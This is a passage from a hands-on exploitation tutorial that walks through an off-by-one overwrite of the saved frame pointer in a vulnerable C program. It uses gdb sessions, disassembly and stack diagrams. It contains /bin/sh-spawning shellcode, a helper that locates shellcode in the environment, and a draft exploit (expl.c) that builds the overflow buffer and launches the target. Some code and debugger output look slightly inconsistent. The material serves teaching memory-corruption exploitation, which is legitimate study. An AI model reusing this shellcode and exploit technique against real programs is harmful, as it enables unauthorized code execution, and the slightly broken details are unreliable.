: push %ebp 0x8048325 : mov %esp,%ebp 0x8048327 : sub $0x8,%esp 0x804832a : and $0xfffffff0,%esp 0x804832d : mov $0x0,%eax 0x8048332 : sub %eax,%esp 0x8048334 : sub $0xc,%esp 0x8048337 : mov 0xc(%ebp),%eax 0x804833a : add $0x4,%eax 0x804833d : pushl (%eax) 0x804833f : call 0x80482f4 0x8048344 : add $0x10,%esp 0x8048347 : leave 0x8048348 : ret 0x8048349 : nop 0x804834a : nop 0x804834b : nop End of assembler dump. (gdb) quit >From the disassemble code of f() you see the following: sub $0x10,%esp It means that the function's stack is 0x10=16 bytes. 4 bytes are allocated to int i,8 are allocated to char z[8] and 4 are allocated to frame pointer held in register ebp. In order to understand better,we will set a breakpoint to ret instruction of function f() and to ret instruction of main() at 0x8048323 and 0x8048348. [root@nebunu hack]# gdb vuln GNU gdb Red Hat Linux (5.2.1-4) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) break *0x8048323 Breakpoint 1 at 0x8048348 (gdb) break *0x8048348 Breakpoint 2 at 0x8048348 (gdb) r AAAAAAAAA Starting program: /root/hack/vuln AAAAAAAAA Breakpoint 1, 0x08048323 in f () (gdb) i r ebp ebp 0xbffffa41 0xbffffa41 (gdb) c Continuing. Breakpoint 2, 0x08048348 in main () (gdb) i r esp esp 0xbffffa45 0xbffffa45 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0040012b in ?? () (gdb) q The program is running. Exit anyway? (y or n) y [root@nebunu hack]# By running the program with 9 chars instead of 8,we overwrite ebp last byte with 0x41 (0x41 is A in hex). When we return from f() our ebp is 0xbffffa41,and when we return from main() esp (stack pointer) is 0xbffffa41+4=0xbffffa45,because ebp was restored in esp (leave instruction) and poped from the stack (4 bytes were added to it). Here is the stack image: [eip] [altered ebp by one byte] char z[8] int i; [esp] By altering esp,the whole stack is translated,therefore a random eip is poped from the stack,so a random instruction will be executed :) Lets investigatate further: .............. (gdb) disas f Dump of assembler code for function f: 0x80482f4 : push %ebp 0x80482f5 : mov %esp,%ebp 0x80482f7 : sub $0x10,%esp 0x80482fa : movl $0x0,0xfffffff4(%ebp) 0x8048301 : cmpl $0x8,0xfffffff4(%ebp) 0x8048305 : jle 0x8048309 0x8048307 : jmp 0x8048322 0x8048309 : lea 0xfffffff8(%ebp),%eax 0x804830c : mov %eax,%edx 0x804830e : add 0xfffffff4(%ebp),%edx 0x8048311 : mov 0xfffffff4(%ebp),%eax 0x8048314 : add 0x8(%ebp),%eax 0x8048317 : mov (%eax),%al 0x8048319 : mov %al,(%edx) 0x804831b : lea 0xfffffff4(%ebp),%eax 0x804831e : incl (%eax) 0x8048320 : jmp 0x8048301 0x8048322 : leave 0x8048323 : ret End of assembler dump. (gdb) break *0x80482fa Breakpoint 2 at 0x80482fa (gdb) r AAAAAAAAA The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/hack/vuln AAAAAAAAA Breakpoint 2, 0x080482fa in f () (gdb) i r esp esp 0xbffffaa8 0xbffffaa8 Now we got esp just before f()'s frame is being activated. Here is the exploit image: [altered ebp] [shellcode address] [shellcode] [nops] It's easy! ebp will be poped from the stack,instruction [shellcode address] will be executed (our fake eip) and it will point to a shellcode. Well,we dont have space for a shellcode,remember that our buffer z[8] is only 8 bytes long? So,if we cant put a shellcode into a buffer what shall we do now? We can use alot of tricks here.Here is a simple one: In our buffer (8 bytes) put a instruction,it will point to our shellcode located in an environment pointer,or higher in memory. Here is the image: [altered ebp] [address to jmp shellcode] [jmp shellcode] Now,lets get the locations,shall we? Since esp is 0xbffffaa8,our buffer in which we'll put the instruction will be placed at 0xbffffaa8+0x04=0xbffffaac where 0x04 is sizeof int i and the pointer to it will be located at 0xbffffaac+0x08-0x04=0xbffffab0. The last byte to alter ebp will be b0-4=ac since when main() returns ebp will be poped from the stack so we have to compensate 4 bytes. Here is the final stack image: [saved eip] [altered ebp] [address to jmp shellcode] --> this is esp [jmp shellcode] Or,to be more specific [saved eip] [0xa4] --> this is the byte that will overflow ebp [0xbffffaac] --> this is the address of instruction [jmp shellcode] Now,enough talking,lets put together the exploit. I'm planning to put the shellcode into an environment,so i know it's exact address,if you dont know what i'm talking about follow the link i gave you at the beginning of this paper. Knowing it's exact address,we write a program that contains instruction,dissasemble it,take the opcodes that fits into 8 bytes and apply the above scheme. ----------------------- dummy.c ----------------------------- #include #include #include char sc[]="\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; void main() { int ret = 0xbffffffa - strlen(sc) - strlen("/root/hack/vuln"); /* this gives us the exact address of the shellcode located in vuln's environment */ printf("\n\n%x\n\n"); } ------------------------------------------------------------- We compile it and run it in order to find the exact address of the shellcode.Dont forget to change /root/hack/vuln with your path in which the vulnerable program lays. [root@nebunu hack]# gcc dummy.c -o dummy dummy.c: In function `main': dummy.c:5: warning: return type of `main' is not `int' [root@nebunu hack]# ./dummy bfffffd3 [root@nebunu hack]# Now we must obtain the opcodes for instruction. Lets go for it: ------------------------- dummy2.c ----------------------- #include main() { __asm("jmp 0xbfffffd3"); } ----------------------------------------------------------- [root@nebunu hack]# gcc dummy2.c -o dummy [root@nebunu hack]# objdump -S dummy | grep jmp 804822a: ff 25 48 94 04 08 jmp *0x8049448 8048234: ff 25 4c 94 04 08 jmp *0x804944c 804823f: e9 e0 ff ff ff jmp 8048224 <_init+0x18> 8048304: e9 ca 7c fb b7 jmp bfffffd3 <_end+0xb7fb6b7b> We are interestead in this: 8048304: e9 ca 7c fb b7 jmp bfffffd3 <_end+0xb7fb6b7b> Our jump shellcode is,as you see "\xe9\xca\x7c\xfb\xb7" Oh noooo! It is 5 bytes long!! 5 bytes jmp shellcode + 4 bytes the address of that makes 9 bytes,and our buffer is only 8 bytes long!! We were owned! :( Are we? We must change the with something that fits in only 4 bytes..lets write a dummy exploit to get the idea.Dont worry, i'll write the real one after so keep reading :) ----------------------- expl.c ---------------------- #include char shellcode[]="\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; char dummy_shellcode[]="\x41\x41\x41\x41"; /* our dummy address */ char *env[2]={shellcode,NULL}; char buffer[9]; main() { /* here we set our instruction */ strcat(buffer,dummy_shellcode); /* here we set it's address,which is (see before),0xbffffaac */ buffer[4]=0xac; buffer[5]=0xfa; buffer[6]=0xff; buffer[7]=0xbf; /* here we set the overflowing byte */ buffer[8]=0xac; /* we run the code */ execle("/root/hack/vuln","vuln",buffer,NULL,env); } -------------------------------------------------------- [root@nebunu hack]# gcc expl.c -o expl; [root@nebunu hack]# gdb --exec=expl --symbol=vuln ..... (gdb) r Starting program: /root/hack/expl Program received signal SIGTRAP, Trace/breakpoint trap. 0x40000b30 in _start () from /lib/ld-linux.so.2 (gdb) disas main Dump of assembler code for function main: 0x8048324